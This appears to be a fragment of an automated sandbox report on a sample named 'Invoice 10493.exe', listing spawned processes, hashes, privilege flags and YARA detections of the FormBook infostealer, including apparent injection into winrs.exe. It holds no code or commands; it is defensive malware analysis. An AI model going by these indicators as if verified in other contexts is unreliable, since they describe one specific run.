                                                                                  Commandline:"C:\Users\user\Desktop\Invoice 10493.exe"
                                                                                  Imagebase:0x780000
                                                                                  File size:47'016 bytes
                                                                                  MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1052986194.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1051362204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:11:10:48
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                  Imagebase:0x140000000
                                                                                  File size:16'696'840 bytes
                                                                                  MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:11:10:48
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\winrs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                                  Imagebase:0xbb0000
                                                                                  File size:43'008 bytes
                                                                                  MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3395750472.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3398160795.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3398079757.0000000003740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:11:11:13
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff736300000
                                                                                  File size:597'432 bytes
                                                                                  MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  No disassembly